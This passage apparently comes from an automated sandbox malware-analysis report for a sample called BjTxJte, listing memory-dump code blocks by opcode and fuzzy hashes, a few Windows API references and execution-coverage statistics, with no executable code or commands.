                                  • Instruction Fuzzy Hash: 78629B34E002058FDB54EB68D684BADBBF2EF89314F248429E406DB795DB75EC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5782ae8589bc67c66baa35856e406a32d769b59970cd0e8160b580c0e1e4ff63
                                  • Instruction ID: ab1ffbcede40608475561148a7f278ed83cb2e374903004ec51282331acc33af
                                  • Opcode Fuzzy Hash: 5782ae8589bc67c66baa35856e406a32d769b59970cd0e8160b580c0e1e4ff63
                                  • Instruction Fuzzy Hash: 2D327E34F012099FDB54EB69E980AADBBB6FF88310F109529E405EB755DB39EC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 149cb77f8a005ab3777ffd9b58a28f9a1f045f4fb492a457324c498e5ab435b9
                                  • Instruction ID: 74a6c7c1f8344a61a015635f1861d3952bb66a663b21074dcd78618e039090e6
                                  • Opcode Fuzzy Hash: 149cb77f8a005ab3777ffd9b58a28f9a1f045f4fb492a457324c498e5ab435b9
                                  • Instruction Fuzzy Hash: 42228330E101099FEF64EF69D5807AEBBB6FB85310F208526E405DB796DA39DC81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: 91d8da94bc29cc684c50f2b12d9efe7acbfa8a434795d7d7f3f604d3a390476d
                                  • Instruction ID: 2ae62d5a7ddf610b1e682cbb06793380c784586c80aeb51bd6b189e17b4087a7
                                  • Opcode Fuzzy Hash: 91d8da94bc29cc684c50f2b12d9efe7acbfa8a434795d7d7f3f604d3a390476d
                                  • Instruction Fuzzy Hash: FDE1A130E402098FDB65EF69D9806AEBBB6FF85300F208529D815EB759DB34DC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: d2f7b8fbffe2df637fac668d10d57d91d14d40cadf5696b6f6cbaff0f6693a4a
                                  • Instruction ID: 8a400dba022f639d1d7186d83a49be65bae9842978e5ba4998ba3529be74771c
                                  • Opcode Fuzzy Hash: d2f7b8fbffe2df637fac668d10d57d91d14d40cadf5696b6f6cbaff0f6693a4a
                                  • Instruction Fuzzy Hash: 98024C30E1020A8FDBA4EF68D580AADBBB6FF85310F10856AD415DBB56DB35EC41CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: dc0f4742fa95b4e1efb696d3389aa74e837ed1e17076b3157293bb883742db0d
                                  • Instruction ID: 8b5662637d6460711e8a416551954a91c20eafef8eda06626564f61968f20f71
                                  • Opcode Fuzzy Hash: dc0f4742fa95b4e1efb696d3389aa74e837ed1e17076b3157293bb883742db0d
                                  • Instruction Fuzzy Hash: 0A914F30F0020A8FDF94DB65D990BAFB7B6FFC4200F108569D809EB799EA749D458B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq
                                  • API String ID: 0-3696375380
                                  • Opcode ID: 547ac2b7c9ea2b780b6bcb4b0047df9a6a6755724f6a324787b7242d1bf60800
                                  • Instruction ID: cbef9a3f316ec314f7b53301a41fff3aa69c7b3ee447680f7da5e65a3680519b
                                  • Opcode Fuzzy Hash: 547ac2b7c9ea2b780b6bcb4b0047df9a6a6755724f6a324787b7242d1bf60800
                                  • Instruction Fuzzy Hash: 7D626230A006068FDB55EF68E690A6EBBB6FF84310F24856DD0059F769DB75EC46CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: foq$XPoq$\Ooq
                                  • API String ID: 0-3137531485
                                  • Opcode ID: 6f625e8d220f48d695c18bf5871d61ae452c9c7e633c89d9ae85c3c2e88eaa40
                                  • Instruction ID: 5ab16f70b901fb4c2b3e78d785d69f6f04383db227e886d4e472e1b8ee4bae84
                                  • Opcode Fuzzy Hash: 6f625e8d220f48d695c18bf5871d61ae452c9c7e633c89d9ae85c3c2e88eaa40
                                  • Instruction Fuzzy Hash: F1617E71F002099FEF54AFA5C9547AEBAF6FF88710F208429E106AB394DB758C45CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: dc1963bca5a9fc3000f33acf2bbbd92dfbcab8cb94648eac33458779c83059bd
                                  • Instruction ID: 47b7ad18020eca4c626a21384c66dcb33d3102a37ea0dd0a66d0550bde9f2bf8
                                  • Opcode Fuzzy Hash: dc1963bca5a9fc3000f33acf2bbbd92dfbcab8cb94648eac33458779c83059bd
                                  • Instruction Fuzzy Hash: 04515030F001059FDF94DB69E990B6F7BFAEFC8250F108469D80ADB399EA759C418B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1454 1e7ef2c-1e7ef49 1457 1e7ef4f-1e7efdc GlobalMemoryStatusEx 1454->1457 1458 1e7ef4b-1e7ef4e 1454->1458 1462 1e7efe5-1e7f00d 1457->1462 1463 1e7efde-1e7efe4 1457->1463 1463->1462
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 01E7EFCF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3282236828.0000000001E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1e70000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 5ebd57e95841b8fa04d687a5322af3215920baf5745794ae62d0d1e215561b8e
                                  • Instruction ID: 879a1e926db2e953f6d6d99cb085d19e4feec716a5a307fa962598ae697b3926
                                  • Opcode Fuzzy Hash: 5ebd57e95841b8fa04d687a5322af3215920baf5745794ae62d0d1e215561b8e
                                  • Instruction Fuzzy Hash: 44218971C042599FDB24DFAAD8046EEBFF4AF48310F1085AAE808A7250D7789980CFE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1466 1e7ef68-1e7efdc GlobalMemoryStatusEx 1468 1e7efe5-1e7f00d 1466->1468 1469 1e7efde-1e7efe4 1466->1469 1469->1468
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 01E7EFCF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3282236828.0000000001E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1e70000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 031968acf150704e84bb381e27ed0f3b052a6b0032be9c3d0c45175ffc334c00
                                  • Instruction ID: aa06bce388f55b66d0de874792f5669cd3bd82f8590e23528f3442a36778f7a1
                                  • Opcode Fuzzy Hash: 031968acf150704e84bb381e27ed0f3b052a6b0032be9c3d0c45175ffc334c00
                                  • Instruction Fuzzy Hash: C3111FB1C0065A9BDB10DFAAC444A9EFBF4AF48320F10816AE818A7240D778A940CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XPoq
                                  • API String ID: 0-2250694691
                                  • Opcode ID: 46d2473dfe0e2b297e121f7e9952fe49c6bf345c577533fbab84d666132e9335
                                  • Instruction ID: 5d9cfcdb3466cb2d8978019e811ebf995530d1da9d80722307ce715798784aa9
                                  • Opcode Fuzzy Hash: 46d2473dfe0e2b297e121f7e9952fe49c6bf345c577533fbab84d666132e9335
                                  • Instruction Fuzzy Hash: F9418E70F002089FDB44AFA5C914BAEBBF7FF88700F208129E105AB394DA758C05CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: e0d56e9338ab6c08abb63383d4d781dd9d61403d5dc21aa244a348a00cee846d
                                  • Instruction ID: 5e66f7089e33d742fb0dccf7512d89fbf0d57be9c598cc8832622ac4b4067ab8
                                  • Opcode Fuzzy Hash: e0d56e9338ab6c08abb63383d4d781dd9d61403d5dc21aa244a348a00cee846d
                                  • Instruction Fuzzy Hash: 01419030E002099FDF65EF64D98469EBFB6FF85300F208529E401EB640EB74D846CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3280599696.0000000001ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ADD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1add000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 6baae2479632cbc1438ed20e6e3381ee510aa89141f570a89953b99e83a450f0
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 6011BBB5504680DFDB02CF54D5C4B55BFA2FB84314F24C6AAD84A4B297C33AE40ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be1dd848ff62504b7c25963f0a5cca361ef87fb3bc75ba2abe4f6b37797ac469
                                  • Instruction ID: bece4808ff3cfd7ee2a13640fb82db73389eef5d3b4f4eef8dd88857f66159d5
                                  • Opcode Fuzzy Hash: be1dd848ff62504b7c25963f0a5cca361ef87fb3bc75ba2abe4f6b37797ac469
                                  • Instruction Fuzzy Hash: 0F11A2B5D01259AFCB10DF9AD984ADEFFB4FB49310F10812AE518A7240C3756554CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17f3a1d11359cd33784f70bffa0e8aa2334b0854324f63edde93f56aecdc11de
                                  • Instruction ID: 0e9d86d9bb348523168e9ec9f8112651fe8a8743dea61717b793a76312920023
                                  • Opcode Fuzzy Hash: 17f3a1d11359cd33784f70bffa0e8aa2334b0854324f63edde93f56aecdc11de
                                  • Instruction Fuzzy Hash: EC01D131F000100BDB64A9BD9950B2FB6DBDFC8720F248439E10AD7745EE29DD024391
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50bfa4b0db16446b92a8798bd4d5e23817c47a4a1c7d28a1e4adedd47a1baa18
                                  • Instruction ID: 6db6326fcbbd370d5379f04f9ce6be58ade014ed2fac3204d199231aa74c765d
                                  • Opcode Fuzzy Hash: 50bfa4b0db16446b92a8798bd4d5e23817c47a4a1c7d28a1e4adedd47a1baa18
                                  • Instruction Fuzzy Hash: EF01D436E11214ABDB64AA69EC409EE7F69EB85710F00453DF515E7341DB26980187D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de60d334f32de016bf226905d20c3fa89bf70fcad2c76d36b57dcb01880e5078
                                  • Instruction ID: 31c265a863e3dc5f3dc575ebc9a0a8b770347d1417ab61eb76848ce73cc2a243
                                  • Opcode Fuzzy Hash: de60d334f32de016bf226905d20c3fa89bf70fcad2c76d36b57dcb01880e5078
                                  • Instruction Fuzzy Hash: 9E018C71F000101BDB65A62DD9A0B2E6ADAEBC9720F208839E20EC7744EE25DC024395
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb2719e9c48dec98a8f9caba836bb7292b2ea492f74bd2d1af5fb26a677eb688
                                  • Instruction ID: 0b0b5d9f598f49794d28f31b764001840d8b464a8ff6def30548a99dee62bd30
                                  • Opcode Fuzzy Hash: fb2719e9c48dec98a8f9caba836bb7292b2ea492f74bd2d1af5fb26a677eb688
                                  • Instruction Fuzzy Hash: 4901A430F000150FEB60E67DE991B2EB7DAEB85710F10883DE50ACBB59EE26DC018784
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b936a788888d13fafa413eed6ac23a2e7306b5ee730583011970d04a2630ba5
                                  • Instruction ID: 34108b25d583b1efcce535a7810cc9be104742e8592a77b2019f34398a0735f5
                                  • Opcode Fuzzy Hash: 8b936a788888d13fafa413eed6ac23a2e7306b5ee730583011970d04a2630ba5
                                  • Instruction Fuzzy Hash: 82E02270D08248ABDF50EFB08C9025A3F6DEB02204F2080E5D404C7202E57ACA0287A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3810553869
                                  • Opcode ID: 7ce76679c7fbc1f966666971f5e384b9db1635710fdcc7a1464562beacd48e87
                                  • Instruction ID: 9e648d56146000d22790df3e1d51d8000af8701cbcd28f0df600879313cc24fa
                                  • Opcode Fuzzy Hash: 7ce76679c7fbc1f966666971f5e384b9db1635710fdcc7a1464562beacd48e87
                                  • Instruction Fuzzy Hash: CA122C30E00219CFDB64EF69D994A9EBBB6FF89300F208569D505AB764DB359D81CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: 40cd4aedd9b09410c0c5ef20ad7c84a5d4c6cd3612a83ed683619ff05ceda7b4
                                  • Instruction ID: 3acc30166ce9b4a020bd7287dd3c5dc981c0d0bfb37d2cb0c1854c90d771a6a9
                                  • Opcode Fuzzy Hash: 40cd4aedd9b09410c0c5ef20ad7c84a5d4c6cd3612a83ed683619ff05ceda7b4
                                  • Instruction Fuzzy Hash: 46918130E90209DFEB64EF65DA94BAE7BB6FF45300F108529E401AB698DB74DD41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 5ee739ca8b74378025bfa60321dd43a11ea2738b049ba9fef8e5abbc6540b11c
                                  • Instruction ID: 93d5930f1a655e9e60a368b158134e9bf79d01b35b3c31b6aad0e985ff45b13b
                                  • Opcode Fuzzy Hash: 5ee739ca8b74378025bfa60321dd43a11ea2738b049ba9fef8e5abbc6540b11c
                                  • Instruction Fuzzy Hash: F0F13F30B00205CFEB54EFA9E590A6EBBB7FF85300F248569D4059B7A9DB359C42CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: 021eb24356a50081ac0ff9ed4e6b4e8672c3021167ad430a638925159ce89960
                                  • Instruction ID: 24eef241d885f08ccc354d12d363e422f33756edf470e9ae27917bfe765f77f3
                                  • Opcode Fuzzy Hash: 021eb24356a50081ac0ff9ed4e6b4e8672c3021167ad430a638925159ce89960
                                  • Instruction Fuzzy Hash: FCB16B30F002098FDB54EF69D5906AEBBB6FF85350F248829D4169B7A5DB74DC82CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: e5b3f9d44ec6345302e117a36a8d2828541512c7bdbf089711175064b9e886d6
                                  • Instruction ID: b6d5e08fe858731dd37e475712316dd92ea7925ca96b53b8d540d1c55c5158b5
                                  • Opcode Fuzzy Hash: e5b3f9d44ec6345302e117a36a8d2828541512c7bdbf089711175064b9e886d6
                                  • Instruction Fuzzy Hash: 0851C334E402058FDFA4EB69E9806AEBBB6FF85310F108529D816DB759DB35DC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq$$jq$$jq
                                  • API String ID: 0-2974078839
                                  • Opcode ID: bfdce5a08486b10763d3cb69a62be22a402d5f661292822dc75e86beac4c0815
                                  • Instruction ID: 52bb2a7fc842dee565ee5407012aa9276e70052ff22ade401fb301ce9466b4bb
                                  • Opcode Fuzzy Hash: bfdce5a08486b10763d3cb69a62be22a402d5f661292822dc75e86beac4c0815
                                  • Instruction Fuzzy Hash: BA51D231B002058FEB58EB78D990A6EBBE6FF84750F10856DD4129B7A9DB75EC00CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:9.9%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:207
                                  Total number of Limit Nodes:12

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Hnq$Hnq
                                  • API String ID: 0-3075287205
                                  • Opcode ID: f096ea641ef4aa0b1b8e4887a4d645ba0b74e3993e9c3d5ec73343f86230e3a0
                                  • Instruction ID: 0cc93e03f1bdfa337231ea089d5a3aa5b549a7dd002626cb80d8d6b566f5b09e
                                  • Opcode Fuzzy Hash: f096ea641ef4aa0b1b8e4887a4d645ba0b74e3993e9c3d5ec73343f86230e3a0
                                  • Instruction Fuzzy Hash: 14817B70E003188FDB04DFA9C8846EEBBF2FF88300F14856AE405AB355DB789905CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1013 4ebd5c8-4ebd5eb 1014 4ebd5f5-4ebd5f8 1013->1014 1015 4ebd601-4ebd73d 1014->1015
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'jq$4'jq
                                  • API String ID: 0-1204115232
                                  • Opcode ID: 0e3846b52d957595ac01aca46a697a82735b4e5ce754d39df302b7129d95041d
                                  • Instruction ID: 8e0683589d91bb171627f01a02c2fea5cbe51970932cac498874889aeafaaaa9
                                  • Opcode Fuzzy Hash: 0e3846b52d957595ac01aca46a697a82735b4e5ce754d39df302b7129d95041d
                                  • Instruction Fuzzy Hash: D1418231E01B0A9BDB14EFB9D84069DB7B2FF95300F21462AE5057B251EBB47985CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1029 4ebd5d8-4ebd5f8 1031 4ebd601-4ebd73d 1029->1031
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'jq$4'jq
                                  • API String ID: 0-1204115232
                                  • Opcode ID: 01b878adcd796969fe4ce955009ef2ef8bdd5c64009533048c15b3c34ab7b1e7
                                  • Instruction ID: 4894ee3befbb0aea85883470bea9b35fb5a3b06830b34ec6d84dfedd4e493e90
                                  • Opcode Fuzzy Hash: 01b878adcd796969fe4ce955009ef2ef8bdd5c64009533048c15b3c34ab7b1e7
                                  • Instruction Fuzzy Hash: CD416231E01B1AABDB14EFB9D8406DDB7B2FF94300F214629E5057B251EBB07985CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0548D4E6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 121fdc9c65b303bd7f600451612aff418bd22ee023e0fc246fb3d13cdc1e3f14
                                  • Instruction ID: edee15dacecf7c055b02d3eb80e6a379fcaa398ab8bfdf3ff1b5ac18cdc1fc31
                                  • Opcode Fuzzy Hash: 121fdc9c65b303bd7f600451612aff418bd22ee023e0fc246fb3d13cdc1e3f14
                                  • Instruction Fuzzy Hash: C3A18B71D01219DFDB24DF68C845BEEBBB2BF48314F1481AAD809A7390DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0548D4E6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: a11a9a9fd67e0ba67aeab651737a7aa9017c4c9645ff532cc8aae09d41a65fc2
                                  • Instruction ID: ea7b9063229047c1d81bd915cf04b9ef6e84277706ae29488a265fece8a16cbf
                                  • Opcode Fuzzy Hash: a11a9a9fd67e0ba67aeab651737a7aa9017c4c9645ff532cc8aae09d41a65fc2
                                  • Instruction Fuzzy Hash: E9918B71D01219DFDB24DF68C944BEEBBB2BF48314F0481AAE809A7390DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00CCB7C6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: e5b70bec268d8a98aa968b881c37eb5dcfcf76b746b546ba5c99c42c17e51b1a
                                  • Instruction ID: 4803abe3bc453552ef597bc1027300d8da94d547853a0f2861fd537d7d3cd9ea
